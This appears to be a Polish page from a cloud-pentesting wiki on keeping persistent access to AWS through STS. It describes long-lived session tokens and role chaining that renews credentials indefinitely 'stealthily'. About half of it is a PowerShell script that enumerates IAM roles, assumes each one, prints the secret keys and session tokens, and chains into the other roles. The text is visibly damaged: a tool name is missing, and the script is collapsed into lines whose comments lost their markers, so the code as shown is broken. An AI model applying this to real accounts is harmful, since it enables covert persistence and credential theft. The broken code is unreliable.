AWS - STS Persistence

Token roli założycielskiej

Tymczasowe tokeny nie mogą być wylistowane, dlatego utrzymywanie aktywnego tymczasowego tokenu jest sposobem na utrzymanie trwałości.

aws sts get-session-token --duration-seconds 129600

aws sts get-session-token \
--serial-number <nazwa-urządzenia-mfa> \
--token-code <kod-z-tokena>

# Nazwa urządzenia sprzętowego to zazwyczaj numer z tyłu urządzenia, np. GAHT12345678
# Nazwa urządzenia SMS to ARN w AWS, np. arn:aws:iam::123456789012:sms-mfa/nazwa-użytkownika
# Nazwa urządzenia wirtualnego to ARN w AWS, np. arn:aws:iam::123456789012:mfa/nazwa-użytkownika

Łańcuch roli

Łańcuch roli to uznana funkcja AWS, często wykorzystywana do utrzymania stealth trwałości. Polega na zdolności przyjęcia roli, która następnie przyjmuje inną, potencjalnie powracając do początkowej roli w cykliczny sposób. Za każdym razem, gdy rola jest przyjmowana, pole wygaśnięcia poświadczeń jest odświeżane. W rezultacie, jeśli dwie role są skonfigurowane do wzajemnego przyjmowania siebie, taka konfiguracja pozwala na wieczyste odnawianie poświadczeń.

Możesz użyć tego narzędzia, aby kontynuować łańcuch ról:

./ -h
usage: [-h] [-r ROLE_LIST [ROLE_LIST ...]]

optional arguments:
-h, --help            show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
Kod do wykonania Role Juggling z PowerShell

```powershell # PowerShell script to check for role juggling possibilities using AWS CLI

Check for AWS CLI installation

if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." exit }

Function to list IAM roles

function List-IAMRoles { aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json }

Initialize error count

$errorCount = 0

List all roles

$roles = List-IAMRoles | ConvertFrom-Json

Attempt to assume each role

foreach ($role in $roles) { $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) try { $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json if ($credentials) { Write-Host "Successfully assumed role: $($role.RoleName)" Write-Host "Access Key: $($credentials.AccessKeyId)" Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" Write-Host "Session Token: $($credentials.SessionToken)" Write-Host "Expiration: $($credentials.Expiration)"

Set temporary credentials to assume the next role

$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey $env:AWS_SESSION_TOKEN = $credentials.SessionToken

Try to assume another role using the temporary credentials

foreach ($nextRole in $roles) { if ($nextRole.Arn -ne $role.Arn) { $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) try { $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json if ($nextCredentials) { Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" Write-Host "Access Key: $($nextCredentials.AccessKeyId)" Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" Write-Host "Session Token: $($nextCredentials.SessionToken)" Write-Host "Expiration: $($nextCredentials.Expiration)" } } catch { $errorCount++ } } }

Reset environment variables

Remove-Item Env:\AWS_ACCESS_KEY_ID Remove-Item Env:\AWS_SECRET_ACCESS_KEY Remove-Item Env:\AWS_SESSION_TOKEN } else { $errorCount++ } } catch { $errorCount++ } }

Output the number of errors if any

if ($errorCount -gt 0) { Write-Host "$errorCount error(s) occurred during role assumption attempts." } else { Write-Host "No errors occurred. All roles checked successfully." }

Write-Host "Role juggling check complete."



